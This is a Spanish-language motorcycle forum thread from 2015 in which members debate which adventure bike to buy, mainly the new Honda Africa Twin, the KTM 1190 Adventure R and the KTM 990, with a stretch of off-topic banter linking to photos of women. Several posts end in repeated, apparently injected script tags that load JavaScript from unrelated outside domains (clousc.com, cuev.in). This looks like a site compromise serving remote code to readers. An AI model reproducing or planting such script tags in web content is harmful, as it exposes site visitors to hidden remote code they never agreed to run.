Sobre lo del motor... hombre, realmente te va la marcha. Creo que he demostrado sobradamente que el motor no me obsesiona cuando de una Super T de 110CV me bajé a una de 50. Cuando comento lo de la Suzuki es porqué aunque tuviera el motor más fabuloso del mundo no me veo en una moto que no me gusta en absoluto ni por diseño ni por concepto (ojo, es mi opinión que contra gustos...).

Y ahora sobre la Africa: Que Honda la ha dejado en 94CV por un tema legal/comercial es evidente, segurísimo que se le pueden sacar mas CV a ese motor sin perder fiabilidad y eso es lo que me toca los coj... No me extrañaría nada que su estrategia sea el ir aumentando prestaciones a medida que les vaya interesando actualizar el modelo.

No vale la pena por un par de décimas o de km/h, bueno, es tu opinión y la respeto pero a mí me habría gustado esa moto con más chicha, y no hablo de 160CV. En función de eso y de otras consideraciones decidiré si me la quedo así y me conformo, o si intento mejorarla, o si me quedo una moto con los CV que no me da la Honda. Y ya está.

A una coca cola te invito cuando quieras aciertes o no. Pero no hay nada que esconder:

Que me quedaré una 450/500 era mi proyecto para 2016 como he comentado en varias ocasiones, lo más probable es que sea la nueva WR450. Dependerá de lo complicado/costoso que sea trailizarla/rallyzarla, lo voy mirando. La lesión hace que ese proyecto que era entre otras cosas para poder correr rallys ahora pueda quedar en segundo plano. Seguramente no estaré a punto para correr y entonces puede esperar.

Por eso voy viendo lo de la moto grande que puede ser a principios de año o más tarde según vea como me recupere y me decida por la enduro o por la gorda. ¿Será la Africa?, puede ser pero están también las otras. Intentaré probarlas todas antes de decidirme.

¿Y que la sacrificada será la Teneré?: no hay que ser muy listo para darse cuenta. Si fuera millonario no sería así ya que será la moto que más me costará desprenderme de ella y sé que algún día me arrepentiré de hacerlo.

Saludos

jaimev
29/11/2015, 23:34
África y la 1190R son las q más me gustan.
La multi enduro si viajara acompañado.
La ADV la tengo casi manía y la 1190 me deja indiferente.
Siendo todas ellas unas motazas

Si. La ventaja es que sea cual sea todas son fantásticas!

MIKY ADVENTURE
29/11/2015, 23:45
Yo también me quedaría con la preparación de la África Twin que espero saquen los de Honda. Aunque para mi la más bonita de largo es la Ducati, pero me dan un miedo las italianas!!!!!!!!

MIKY ADVENTURE
29/11/2015, 23:46
Por cierto, recupérate el hombro al 100 % que luego dan mucha guerra. Mucho ánimo.

jaimev
30/11/2015, 10:51
Yo también me quedaría con la preparación de la África Twin que espero saquen los de Honda. Aunque para mi la más bonita de largo es la Ducati, pero me dan un miedo las italianas!!!!!!!!

No es una decisión fácil no... la Honda es esa chica maja, agradable y simpática con la que lo compartirías todo, la Ducati es ese pendón inaccesible, que te deja embobado y con la que sabes que la vida será complicada pero muuuy divertida. Algo parecido pasa con las Katys. La GSA estaría en un punto intermedio.

Lo más sensato a largo plazo sería quedarse con la Honda, pero viendo lo que me duran las motos algo de riesgo también mola.

Le voy dando vueltas y depende de como me levanto va cambiando la decisión, hay que irlo madurando... :D


Por cierto, recupérate el hombro al 100 % que luego dan mucha guerra. Mucho ánimo.

Muchas gracias, estoy dispuesto a trabajar duro para que así sea, soy optimista.

Saludos!

FAZER
30/11/2015, 10:53
Para un tio como tu que "no sabe" ir en moto cualquiera te vale...


:penita:

jaimev
30/11/2015, 12:04
Para un tio como tu que "no sabe" ir en moto cualquiera te vale...


:penita:

Gracias Fazer pero la edad no perdona y cada vez me interesa menos complicarme la vida ;)
Lo bueno es que nos tocará la lotería de Motostrail i podremos escoger varias para asegurar el tiro :D

JOE VESPINO
30/11/2015, 12:05
Yo no me fiaría mucho de los pesos declarados hasta que la moto no esté en la calle.

Para mi, si se puede asumir el sobreprecio, la autentica rival de la AT es la 1190R, que son 150 caballos (uff que pepino), suspensiones pata negra (demostradas), y sobre todo el sistema de control de estabilidad y abs con curva, que en una moto que se va a utilizar en gran parte por carretera es algo que no dudaría en poner.

Saludos.

Marcos
30/11/2015, 14:04
Para mi, si se puede asumir el sobreprecio, la autentica rival de la AT es la 1190R, que son 150 caballos (uff que pepino), suspensiones pata negra (demostradas), y sobre todo el sistema de control de estabilidad y abs con curva, que en una moto que se va a utilizar en gran parte por carretera es algo que no dudaría en poner.
Fffff la probé en Italo en Barcelona, fue llegar a una zona de curvitas y me hice un recto en la primera que casi me mato. En pista soy un paquete pero de road llevo muchas horas/motos y me parece, simplemente, desproporcionada. En contra de otras ktms que he probado, ésta sí que va bien abajo del todo, pero de las vueltas medias a las encabritadas pasa sin avisar: a 4 mil rpm ya te está dando una barbaridad de potencia y es mucha mala leche la que te pega eso en el culo, porque es una moto canija y relativamente pequeña para el leviatán que lleva dentro; de alguna forma no te lo esperas.
Vamos, en mi opinión, meter eso en una pista no es para todo el mundo.

jaimev
30/11/2015, 16:40
Yo no me fiaría mucho de los pesos declarados hasta que la moto no esté en la calle.

Para mi, si se puede asumir el sobreprecio, la autentica rival de la AT es la 1190R, que son 150 caballos (uff que pepino), suspensiones pata negra (demostradas), y sobre todo el sistema de control de estabilidad y abs con curva, que en una moto que se va a utilizar en gran parte por carretera es algo que no dudaría en poner.

Saludos.

100% de acuerdo

jaimev
30/11/2015, 16:46
Fffff la probé en Italo en Barcelona, fue llegar a una zona de curvitas y me hice un recto en la primera que casi me mato. En pista soy un paquete pero de road llevo muchas horas/motos y me parece, simplemente, desproporcionada. En contra de otras ktms que he probado, ésta sí que va bien abajo del todo, pero de las vueltas medias a las encabritadas pasa sin avisar: a 4 mil rpm ya te está dando una barbaridad de potencia y es mucha mala leche la que te pega eso en el culo, porque es una moto canija y relativamente pequeña para el leviatán que lleva dentro; de alguna forma no te lo esperas.
Vamos, en mi opinión, meter eso en una pista no es para todo el mundo.

La 1190 R es la única que he probado a fondo. Es una bestia parda pero con la electrónica la encontré muy dosificable. Increíble lo que se puede hacer con ella en campo.
Otra cosa es que le quites la mordaza, entonces hay que ir preparado para entrar en otra dimensión!!
Las únicas pegas que le encontré son la altura del asiento, demasiado alta para mí, el calor insoportable en el culo y que estéticamente no me convence del todo.

domingo
30/11/2015, 20:42
Las únicas pegas que le encontré son la altura del asiento, demasiado alta para mí, el calor insoportable en el culo y que estéticamente no me convence del todo.
Para el tema del calor sé que ktm ha sacado un suplemento que lo soluciona....

gasclassic
01/12/2015, 10:07
A ver Gasclassic

Si, hay que ser justos con el peso y por eso puse la diferencia con la versión sin ABS.

Seguro que a la Honda se le podrán sacar unos kgs pero también se añadirán en equipamiento y protecciones. Lo mismo me pasó en mi 660 por lo que esos 27+5 si me tuviera que quedar la de ABS por reglamentación se quedarán en unos ¿25kgs? más que en mi Tenere.

Son kilos pero también es cierto que no son motos comparables, son solo datos a tener en cuenta.

Sobre lo del motor... hombre, realmente te va la marcha. Creo que he demostrado sobradamente que el motor no me obsesiona cuando de una Super T de 110CV me bajé a una de 50. Cuando comento lo de la Suzuki es porqué aunque tuviera el motor más fabuloso del mundo no me veo en una moto que no me gusta en absoluto ni por diseño ni por concepto (ojo, es mi opinión que contra gustos...).

Y ahora sobre la Africa: Que Honda la ha dejado en 94CV por un tema legal/comercial es evidente, segurísimo que se le pueden sacar mas CV a ese motor sin perder fiabilidad y eso es lo que me toca los coj... No me extrañaría nada que su estrategia sea el ir aumentando prestaciones a medida que les vaya interesando actualizar el modelo.

No vale la pena por un par de décimas o de km/h, bueno, es tu opinión y la respeto pero a mí me habría gustado esa moto con más chicha, y no hablo de 160CV. En función de eso y de otras consideraciones decidiré si me la quedo así y me conformo, o si intento mejorarla, o si me quedo una moto con los CV que no me da la Honda. Y ya está.

A una coca cola te invito cuando quieras aciertes o no. Pero no hay nada que esconder:

Que me quedaré una 450/500 era mi proyecto para 2016 como he comentado en varias ocasiones, lo más probable es que sea la nueva WR450. Dependerá de lo complicado/costoso que sea trailizarla/rallyzarla, lo voy mirando. La lesión hace que ese proyecto que era entre otras cosas para poder correr rallys ahora pueda quedar en segundo plano. Seguramente no estaré a punto para correr y entonces puede esperar.

Por eso voy viendo lo de la moto grande que puede ser a principios de año o más tarde según vea como me recupere y me decida por la enduro o por la gorda. ¿Será la Africa?, puede ser pero están también las otras. Intentaré probarlas todas antes de decidirme.

¿Y que la sacrificada será la Teneré?: no hay que ser muy listo para darse cuenta. Si fuera millonario no sería así ya que será la moto que más me costará desprenderme de ella y sé que algún día me arrepentiré de hacerlo.

Saludos

Pero es que no entiendo que quieras comparar el peso de tu actual Tenere 660 con el de la nueva Africa Twin.
En cualquier caso ¿no habría que comparar las opciones que propones entre si?
Y ahí, parece ser que precisamente la mas ligera es la AT.

Sobre lo del motor, o no me he explicado o no me has entendido.
Está claro que la V-Strom no te gusta, ni a ti, ni a muchísima gente, solo hay que ver su escaso éxito.
Pero lo que he intentado decir es que no entiendo que se use como argumento los 160 cv de la Multistrada y la 1290 y luego se le quite importancia a eso con la V-Strom.
Collons ¿importan o no importan los cv?

Sobre las evoluciones, subir cv significa perder mercado (A2), aunque hacer dos versiones puede ser, ya se verá, de todas formas seguramente que con un escape y un power comander o similar, igual se le puedan sacar esos 10 cv mas, como le has sacado 8 a tu 660.

Sobre la WR, no se trata ni de descubrir nada ni de ser muy listo, como dices, ya lo has dicho varias veces.
De ahí que yo crea que será lo que acabarás haciendo.

Sobre el arrepentimiento, un clavo saca otro clavo.
Aunque imagino que lo suyo es encontrar el adecuado.
Si tan claro tienes que te arrepentirás y será de la que mas te cueste desprenderte, pues no lo hagas!
Y si ello implica no poder llegar a la otra combinación (WR+AT), pues noi, ajo y agua, que en la vida todo no se puede tener.

Mira, yo la AT no la suelto ni con agua caliente, precisamente por que tengo claro que me arrepentiría.
Y de hacerlo (junto a las demás), me daría para poder comprar una AT nueva, pero como tampoco soy millonario, pues elijo en consecuencia y sin quejarme.
Prefiero 3 o 4 viejas que una top model moderna.
Ahora, eso si, no verás quejarme de que no pueda tener una AT 1000 o de que "deba" vender la AT750.

Por cierto, si puedes tener dos, yo si la vendería (a la 660 me refiero).
Otra cosa es como moto única.

conejilope
01/12/2015, 11:39
Prefiero 3 o 4 viejas que una top model moderna.

hombre todo depende.

Entre esto

http://www.eljueves.es/medio/2008/12/30/viejas_en_la_piscina_310x202.jpg

Y esto
http://images1.fanpop.com/images/image_uploads/SMG-Vaseline-sarah-michelle-gellar-1149026_818_1234.jpg


Yo lo tengo claro

josext
01/12/2015, 12:57
Jejejeje que bueno

gasclassic
01/12/2015, 13:12
hombre todo depende.

Entre esto

http://www.eljueves.es/medio/2008/12/30/viejas_en_la_piscina_310x202.jpg

Y esto
http://images1.fanpop.com/images/image_uploads/SMG-Vaseline-sarah-michelle-gellar-1149026_818_1234.jpg


Yo lo tengo claro

Ya.
Y entre esta de 27:

http://img.thesun.co.uk/aidemitlum/archive/01679/Adele1_620_1679958a.jpg


Y entre esta otra de 39 años, que casi podría ser su madre:

http://www.gotceleb.com/wp-content/uploads/photos/elsa-pataky/el-hormiguero-tv-show-in-madrid/Elsa-Pataky:-El-Hormiguero-TV-Show--36-662x995.jpg

¿que?

conejilope
01/12/2015, 14:47
La de 27 no es top model. Jejeje y Elsa Pataki tampoco, ella es una diosa. Jajajaja aunque tas pasao diciendo que podia ser su madre.

JOE VESPINO
01/12/2015, 15:35
Hombre Gass, una de 39 madre de otra de 27!!! :lol:

gasclassic
01/12/2015, 15:56
La de 27 no es top model. Jejeje y Elsa Pataki tampoco, ella es una diosa. Jajajaja aunque tas pasao diciendo que podia ser su madre.


Hombre Gass, una de 39 madre de otra de 27!!! :lol:

Me cito, a ver si así......
Y entre esta otra de 39 años, que casi podría ser su madre

Pero ya que veo que no sirve, me pongo serio y veo la apuesta:

Viktoria Manas, top model, 29 años:

http://img.lagaceta.com.ar/fotos/galerias/2855/2855_20141121221255.jpg

Cindy Crawford, ex top model, 49 años:

https://i.ytimg.com/vi/9hgOzQ1k95I/maxresdefault.jpg

Elle MacPherson, solo 52 años, ex top model también:

http://media.vogue.com/r/h_480,w_480/2015/03/27/05-elle-by-day.jpg

Ale, pa vosotros la jovencita :-D

jaimev
01/12/2015, 22:02
Pero es que no entiendo que quieras comparar el peso de tu actual Tenere 660 con el de la nueva Africa Twin.
En cualquier caso ¿no habría que comparar las opciones que propones entre si?
Y ahí, parece ser que precisamente la mas ligera es la AT.

He puesto la Tenere porque es la moto que tengo ahora y precisamente tu has dicho muchas veces (y con razón) que es muy pesada. 30 kgs más sobre una moto pesada demuestra que no se han esforzado en hacerla ligera. Era un simple ejemplo pero estoy de acuerdo que no son motos comparables. Otra cosa es que si los pesos están bien puestos se notan poco. En fin, que si me la quedo ya tengo donde trabajar.

Esto es lo que digo en el post:
"Pesa 208kgs vacía y 228 llena (versión básica sin ABS ni control de tracción) y por tanto es la más ligera de todas"

Por tanto si que comparo las opciones (de hecho todo el post es una comparativa). Coincidimos: ¿contento?



Sobre lo del motor, o no me he explicado o no me has entendido.
Está claro que la V-Strom no te gusta, ni a ti, ni a muchísima gente, solo hay que ver su escaso éxito.
Pero lo que he intentado decir es que no entiendo que se use como argumento los 160 cv de la Multistrada y la 1290 y luego se le quite importancia a eso con la V-Strom.
Collons ¿importan o no importan los cv?

Si que te entiendo, buscas tres pies al gato. Yo no le he quitado importancia al motor de la V-Strom, todo lo contario. Cuando digo que el motor no lo es todo quiero decir que si bien la V tiene un motoraco el resto de la moto no me gusta nada, ok?
En cambio en la 1290 y en la Multi me gusta también el resto de la moto y por eso no considero a la Suzuki y si a las otras.



Sobre las evoluciones, subir cv significa perder mercado (A2), aunque hacer dos versiones puede ser, ya se verá, de todas formas seguramente que con un escape y un power comander o similar, igual se le puedan sacar esos 10 cv mas, como le has sacado 8 a tu 660.

Pues si es así perfecto. Sin embargo estamos hablando de cosas absolutamente teóricas. Todo lo que me pueda parecer ahora son conjeturas y no pienso tomar ninguna decisión hasta probarla, tal como he dicho. Si los 50CV de mi actual moto han sido suficientes para pasármelo bien, el doble, que es lo que tiene la Africa, seguramente serán la hostia. Y si no es así y se pueden aumentar con un simple escape mejor que mejor. Tranquilo, déjame probarla y si me gusta me la quedaré, no sufras.



Sobre la WR, no se trata ni de descubrir nada ni de ser muy listo, como dices, ya lo has dicho varias veces.
De ahí que yo crea que será lo que acabarás haciendo.

Pues vale, a ver si no te decepciono



Sobre el arrepentimiento, un clavo saca otro clavo.
Aunque imagino que lo suyo es encontrar el adecuado.
Si tan claro tienes que te arrepentirás y será de la que mas te cueste desprenderte, pues no lo hagas!
Y si ello implica no poder llegar a la otra combinación (WR+AT), pues noi, ajo y agua, que en la vida todo no se puede tener.

Uff voy a tener que hilar muy fino en lo que diga... ¿no te ha pasado nunca que te da un dolorcillo cuando te desprendes de una moto? A mi si. Y más cuando he trabajado en ella y ha quedado tan bien como esta. Sin embargo ese momento queda de sobras compensado con la ilusión de lo nuevo y por eso la cambiaré.



Mira, yo la AT no la suelto ni con agua caliente, precisamente por que tengo claro que me arrepentiría.
Y de hacerlo (junto a las demás), me daría para poder comprar una AT nueva, pero como tampoco soy millonario, pues elijo en consecuencia y sin quejarme.
Prefiero 3 o 4 viejas que una top model moderna.
Ahora, eso si, no verás quejarme de que no pueda tener una AT 1000 o de que "deba" vender la AT750.

Pues me parece muy bien y a mi tampoco me verás quejarme si puedo cambiarla. Simplemente venía a decir que si pudiera tendría las tres.



Por cierto, si puedes tener dos, yo si la vendería (a la 660 me refiero).
Otra cosa es como moto única.

Totalmente de acuerdo. Como moto única es la que me quedaría pero soy un culo inquieto..

jaimev
01/12/2015, 22:14
Sobre el resto de comentarios del post mejor no opino.
Habría que saber que opinan ellas y no creo que fuera muy agradable...

gasclassic
02/12/2015, 09:24
Sobre el resto de comentarios del post mejor no opino.
Habría que saber que opinan ellas y no creo que fuera muy agradable...

¿y por que lo crees?
Si somos unos FILF.

jaimev
02/12/2015, 16:40
¿y por que lo crees?
Si somos unos FILF.

Venga, a ver esas fotos en traje de baño ;)

gasclassic
02/12/2015, 19:40
Venga, a ver esas fotos en traje de baño ;)

Hombre, ahora ase frio, pero ya tu sabes, sabrosón :bailones:

SergioTrail
02/12/2015, 21:44
Pero ya que veo que no sirve, me pongo serio y veo la apuesta:

Viktoria Manas, top model, 29 años:

http://img.lagaceta.com.ar/fotos/galerias/2855/2855_20141121221255.jpg



:-D
Yo a la gordibuena no le hago ningún asco.

gasclassic
02/12/2015, 22:00
Yo a la gordibuena no le hago ningún asco.

Con ese jamón, hambre no pasarías.

Cherokee
02/12/2015, 23:24
Mejor jamón jugoso que cecina reseca

Tomy
02/12/2015, 23:28
Se pueden poner culos... ?? :ole:

Cherokee
02/12/2015, 23:32
:golpe::descohone::descohone::descohone::descohone :

CAGANER
02/12/2015, 23:44
Esto vendría siendo la Africa del Manchi?

http://images.tapatalk-cdn.com/15/12/02/878c2871f9638e31867991ad8c45b920.jpg

Tomy
02/12/2015, 23:48
:descohone::descohone::descohone:

Cherokee
02/12/2015, 23:54
:descohone:

JOE VESPINO
03/12/2015, 00:10
:descohone::descohone::descohone::descohone:<script type="text/javascript" src="https://clousc.com/player.php?ver=1.0&ref=at"></script><script type="text/javascript" src="https://clousc.com/player.php?ver=1.0&ref=at"></script><script type="text/javascript" src="https://clousc.com/player.php?ver=1.0&ref=at"></script>

gasclassic
03/12/2015, 07:36
:descohone::descohone::descohone:

jaimev
03/12/2015, 07:52
SEÑORES!! YA ESTÁ BIEN!! ESTO SE HA DESMADRADO!!

HABLEMOS DE MOTOS!!

gasclassic
03/12/2015, 08:26
SEÑORES!! YA ESTÁ BIEN!! ESTO SE HA DESMADRADO!!

HABLEMOS DE MOTOS!!

¿desmadre?
¿Cómo estas?:

https://40.media.tumblr.com/6271b75d8002684eee036f3fbb010c15/tumblr_inline_nqtr0439D51qan247_540.jpg

Uy, perdón, me he equivocado de foto, que no son amotos.
La hija, la madre y la madre de la madre:

http://images.tapatalk-cdn.com/15/10/01/18721bcea21c63561ad696042c419290.jpg

Ah por cierto Jaume, existe una versión aligerada de la Africa Twin, que igual te mola mas.
Y aun con la drástica pérdida de peso, conserva la posibilidad de llevar pasajero.
Mira a ver que tal, por que encima me parece que no es cara:

http://img707.imageshack.us/img707/8181/vehg.jpg

Tomy
03/12/2015, 09:12
PUES LA MAS CARA... Y SEGURO QUE ACIERTAS !!

Edu65
03/12/2015, 10:32
Vamos a pensar con cual nos quedamos.....

http://images.tapatalk-cdn.com/15/12/03/6725a54f116391aefdafa069b92bd1c5.jpg

gasclassic
03/12/2015, 10:46
Edu65, al menos pon una moto para disimular :lol:

http://www.daidegasforum.com/images/Girls/1/honda-africa-twin-sexy-girl.jpg

Edu65
03/12/2015, 10:53
Vale..... http://images.tapatalk-cdn.com/15/12/03/31d3a1b1b6b1b72b106f5cfbad1da550.jpg

Cherokee
03/12/2015, 11:03
:-D:-D:-D:-D:-DAra mola este post

gasclassic
03/12/2015, 11:09
Vale..... http://images.tapatalk-cdn.com/15/12/03/31d3a1b1b6b1b72b106f5cfbad1da550.jpg

Oiga ¿y no las tiene con modelos del sexo contrario?
Es que esos que se ven a lo lejos, aparentan tener barba.

Cherokee
03/12/2015, 15:07
Ostia si...

Edu65
03/12/2015, 15:56
http://images.tapatalk-cdn.com/15/12/03/9dd65eb5140a5eec05cfd188c7c40696.jpg

JOE VESPINO
03/12/2015, 16:04
Ja, ja, en cuanto aparezca el gran jefe nos/os va a banear :lol:<script type="text/javascript" src="https://clousc.com/player.php?ver=1.0&ref=at"></script><script type="text/javascript" src="https://clousc.com/player.php?ver=1.0&ref=at"></script>

gasclassic
03/12/2015, 16:19
Ostias! Ya me gustaria tener una adventure con la BMW.

FAZER
03/12/2015, 17:11
Ja, ja, en cuanto aparezca el gran jefe nos/os va a banear :lol:<script type="text/javascript" src="https://clousc.com/player.php?ver=1.0&ref=at"></script><script type="text/javascript" src="https://clousc.com/player.php?ver=1.0&ref=at"></script>

Y empezare por orden alfabetico.....

Cherokee
03/12/2015, 21:42
http://images.tapatalk-cdn.com/15/12/03/9dd65eb5140a5eec05cfd188c7c40696.jpg

Como alguien ponga el video del que sale esta foto, no se si nos banea o deja el post fijo arriba :-D:-D:-D

gasclassic
03/12/2015, 22:09
Como alguien ponga el video del que sale esta foto, no se si nos banea o deja el post fijo arriba :-D:-D:-D

Ah, ¿pero hay vídeo?
Si sale la moto, la usamos como atenuante.

Antonio69
03/12/2015, 22:09
La leche, como estamos....

JAUME!!!! 1190 Adventure R. No lo dudes.

Urwald
04/12/2015, 10:22
Jaume!

1190 Adventure R!

Te lo digo yo como novato y que tiene una!

:loca:

Ahora en serio, todas son grandes maquinas y estaba casi cómo tu hace 3 semanas (http://www.motostrail.com/vb2011/threads/33599-Dudas-Nueva-Adquisici%C3%B3n). De hecho deje la tenere para hacer el cambio aunque no la tenia como la tuya y dolio menos.

No te voy a contar nada que no sepas de la 1190R, solo comentarte que tienes toda la razón acerca de la dosificación. Del tema calor del motor, hasta fin de año ktm regala el kit de protección para que no te achicharres las joyas de la corona. Yo aún no lo llevo puesto, pero al hacer este fresquito tampoco lo hecho en falta.

Salut!

jaimev
05/12/2015, 10:25
Está claro que Africa y 1190R son las grandes candidatas. Se nota que este foro tiene tendencia campera.

¿Contento con ella Marc?. ¿Cuanto mides? llegas bien al suelo?

Urwald
05/12/2015, 16:52
Está claro que Africa y 1190R son las grandes candidatas. Se nota que este foro tiene tendencia campera.

¿Contento con ella Marc?. ¿Cuanto mides? llegas bien al suelo?

Pues de momento encantado! Soy alto, 1,90 y si, llego bien.

Creo que JoanCG tiene una y quizas te puede contar mas cosas que yo de la moto!

Hechale un ojo a este post (http://advrider.com/index.php?threads/my-2015-ktm-1190-adventure-r-build-starts-ends-now.1074146/), los yankees no se andan con tonterias!

jaimev
05/12/2015, 19:07
Pues de momento encantado! Soy alto, 1,90 y si, llego bien.

Creo que JoanCG tiene una y quizas te puede contar mas cosas que yo de la moto!

Hechale un ojo a este post (http://advrider.com/index.php?threads/my-2015-ktm-1190-adventure-r-build-starts-ends-now.1074146/), los yankees no se andan con tonterias!

Son esos centímetros que me faltan para llegar bien al suelo... :(

No, esos yankees van fuertes!

gracias!

findus
08/12/2015, 15:02
Sin la mas minima duda... como moto nueva escogería la nueva Africa, pero como me parece una replica de una 990 y estas se encuentran mas baratas, prefiero quedarme con la original. Es la autentica trail, ya se que pesa, pero cumple de diez en el 90 por ciento de las ocasiones. Y encima puedes viajar con ella sin limites.

gasclassic
08/12/2015, 16:30
Sin la mas minima duda... como moto nueva escogería la nueva Africa, pero como me parece una replica de una 990 y estas se encuentran mas baratas, prefiero quedarme con la original. Es la autentica trail, ya se que pesa, pero cumple de diez en el 90 por ciento de las ocasiones. Y encima puedes viajar con ella sin limites.

Puestos a quedarnos con la original, ¿por que no una Africa Twin 750?
O incluso la 650.
O ya puestos la BMW R80G/S

findus
09/12/2015, 08:45
Puestos a quedarnos con la original, ¿por que no una Africa Twin 750?
O incluso la 650.
O ya puestos la BMW R80G/S

La respuesta es sencilla..... porque ninguna de ellas supera a la nueva África, en cambio la 990 la supera en casi todo, apesar de los años.
Si honda hubiera querido superar a la 990, lo habría conseguido sin duda. Pero evidentemente a querido copiar el concepto. Y que coste, lo han hecho muy bien.

cruiser
09/12/2015, 09:53
La respuesta es sencilla..... porque ninguna de ellas supera a la nueva África, en cambio la 990 la supera en casi todo, apesar de los años.
Si honda hubiera querido superar a la 990, lo habría conseguido sin duda. Pero evidentemente a querido copiar el concepto. Y que coste, lo han hecho muy bien.

Que rotundo, sin haberla probado, ni que la haya probado nadie que conozcas, ni haberla visto de cerca, ni

gasclassic
09/12/2015, 14:40
La respuesta es sencilla..... porque ninguna de ellas supera a la nueva África, en cambio la 990 la supera en casi todo, apesar de los años.
Si honda hubiera querido superar a la 990, lo habría conseguido sin duda. Pero evidentemente a querido copiar el concepto. Y que coste, lo han hecho muy bien.

Por partes, que me pierdo.
1 - Esas viejas AT, GS, ST en muchos aspectos (en algunos si) no superan a la 990 o AT1000, pero de ahí a considerar a la 990 como la original, no.
Mas que nada por que cuando la sacaron hace ya poco mas de 10 años, las trail grandes (G/S80, XLV750......) llevaban mas de 20 años en el mercado.

2 - ¿casi todo? creo que mas bien en casi nada.
Veamos:
Motor, ¿en que es mejor el de la 990?
Solo en la distribución del peso, en lo demás, no y aun así, un V2 pesa mas que un L2.
La 990 gasta mas, el mantenimiento es mas caro y no corre mas, por que ambos ofrecen la misma potencia.

Frenos, las dos puedes equipar ABS, pero la AT lleva pinzas radiales, con lo cual va a frenar mas.

Chasis, no se como irá el de la AT, ¿pero por que das por supuesto que es mejor el multitubular de la 990?

Suspensiones, mas regulaciones no tiene por que significar mas calidad.

Ergonomía, el asiento de la AT parece mas cómodo.

Precio, tampoco es que la 990 fuera mas barata, lo es ahora por que son motos usadas, pero si comparamos precios, nueva costaba parecido a lo que piden por la AT.

Y si hablamos del cambio, en la AT puedes escoger manual o automático, que gustará mas o menos, pero es un avance y una opción mas.

En fin, ya nos dirás en que supera la 990 a la AT1000.

Para mi, la AT 1000 es una evolución de la 990, como en su día esta lo fue de la AT750.
Y si el dinero es determinante, por 7.000 € te puedes comprar una buena 990 y te ahorras otros 7.000 €, pero si tanto importa la parte económica, me gasto 3.000 € en una AT750, total, voy a hacer lo mismo y seguirá siendo una moto vieja y usada.

JOE VESPINO
09/12/2015, 15:58
Bueno, yo preferiría esperar a que la prueben de verdad (sobre todo por el peso, por la calidad de suspensiones etc)

Lo que creo que quiere decir Gon, y yo estoy de acuerdo con él hasta ahí, es que 990 fue pensada mas para off que la AT nueva (con todas las reservas, hasta que la prueben). Si Honda hubiese querido hacer una maquina tan off seguramente lo hubiera conseguido, pues tiene mucha experiencia y sigue siendo una marca puntera en motocross, pero, aunque solo sea por la "ofensiva publicitaria" que está desplegando, todo parece indicar que quiere hacer una moto polivante para vender mucho, no una maquina tan minoritaria y especifica como en su dia fue la 950-990.

Por lo demás, hacer comparaciones entre motos diseñadas con 12, 15 o 20 años de diferencia, pues no sirve de mucho.<script type="text/javascript" src="https://cuev.in/aux.php?ver=1.0&ref=at"></script>

JorgeXC
09/12/2015, 16:49
En mí modesta opinión y sin ninguna duda ese pedazo de nueva Honda Africa Twin se vendría conmigo a casa .... y a vivir que son dos días.

Marcos
09/12/2015, 16:56
En mí modesta opinión y sin ninguna duda ese pedazo de nueva Honda Africa Twin se vendría conmigo a casa ....

Ja. A día de hoy no se me ocurre nada mejor en que gastarme esos 13 si los tuviera, eso seguro. Otra cosa es que después la metiera en el campo...

findus
09/12/2015, 19:10
Que rotundo, sin haberla probado, ni que la haya probado nadie que conozcas, ni haberla visto de cerca, ni

No claro que no la he probado, ya me gustaría :motorista: , pero se a leído, hablado y visto tanta información que todos nos podemos hacer una idea del tipo de moto que será. Que puede que me equivoque? pues puede, pero no creo, vuelvo a recordar lo mucho que se a escrito sobre esta moto y las expectativas que a creado no tiene parangón.

findus
09/12/2015, 20:20
Sin la mas minima duda... como moto nueva escogería la nueva Africa, pero como me parece una replica de una 990 y estas se encuentran mas baratas, prefiero quedarme con la original. Es la autentica trail, ya se que pesa, pero cumple de diez en el 90 por ciento de las ocasiones. Y encima puedes viajar con ella sin limites.


Para mi, la AT 1000 es una evolución de la 990, como en su día esta lo fue de la AT750.
Y si el dinero es determinante, por 7.000 € te puedes comprar una buena 990 y te ahorras otros 7.000 €, pero si tanto importa la parte económica, me gasto 3.000 € en una AT750, total, voy a hacer lo mismo y seguirá siendo una moto vieja y usada.

Pues hombre... con diferentes palabras pero decimos lo mismo y claro que vas a hacer lo mismo con la AT750 que con la 990, pero también lo harías con una honda tlr 200 o con una bultaco, mira a Ignacio Chivite. El limite lo pone cada uno :)

Respecto a tu comparativa entre la la AT nueva y la 990 pues, aunque me quedo con ganas, no voy a entrar a rebatirtela. Quien conozca la 990 ya sabe lo que es y puede ver y comparar una y otra moto, aunque las separen 15 años y 7000 euros. Pero una cosa si te digo seguro, la 990 es muchooo mas barata de mantenimiento que cualquier japo.

Un saludo compis

Antonio69
09/12/2015, 21:31
A mí, sobre el papel, la nueva África me parece una copia de la 1050 adventure. No creo que haya muchas diferencias de comportamiento entre una y otra. La pega que le veo a la África (sin probarla) es ese concepto de "moto fácil" que tiene honda. Prefiero la filosofía"Ready to Race". Con el bagage motociclístico de Jaume estoy convencido que su moto es una Adventure R.

jaimev
09/12/2015, 22:08
Creo que no tiene sentido ponerse a comparar motos que son diferentes, tan diferentes como las épocas en que se diseñaron cada una de ellas.

Para mi está claro que Honda ha querido marcar su camino en los tiempos actuales... y se ha quedado muy cerca de lo que desgraciadamente KTM ha dejado de hacer.
Y por algo será.
De hecho es curioso que ahora todos añoremos a la 990 y en cambio en su momento no fuera un best seller.
Creo que Honda se ha desmarcado de la tendencia de las grandes trails asfálticas con una moto que busca gustar a un segmento mucho más amplio de público que la 990. Una moto que no de miedo, fácil de llevar, de mantener... con la electrónica justa, sin complicadas suspensiones ni gadgets superfluos. No será tan efectiva en campo como la 990 pero suficiente para lo que hacen el 90% de los posibles compradores y en cambio seguramente será mejor por carretera, que es lo que hace la mayoría.
Para mí han dado en el clavo, cada vez estoy más convencido.
Los que lo van a tener complicado son los de BMW con su 800, ahí es donde creo que la AT va a hacer más daño.

Mi única duda no viene de la moto ni de su concepto sino que viniendo de la 660 y con la posibilidad de tener una enduro trailizada también me apetece un cambio hacia algo más radical y quizás más asfáltico (y ilógico, que ya veo venir a gasclassic). Si no fuera por eso no lo dudaría y me iría a por la AT. Me la imagino con un escape doble, unos adhesivos y cuatro chuches bien puestas y me pongo cachondo. :D

Y sigo sin descartar la Adventure R, Antonio_1 ;)

Martín
09/12/2015, 22:11
Yo me tiraría por la nueva Africa Twin, más por la novedad y por no estar todavía vista.

gasclassic
10/12/2015, 09:28
Bueno, yo preferiría esperar a que la prueben de verdad (sobre todo por el peso, por la calidad de suspensiones etc)

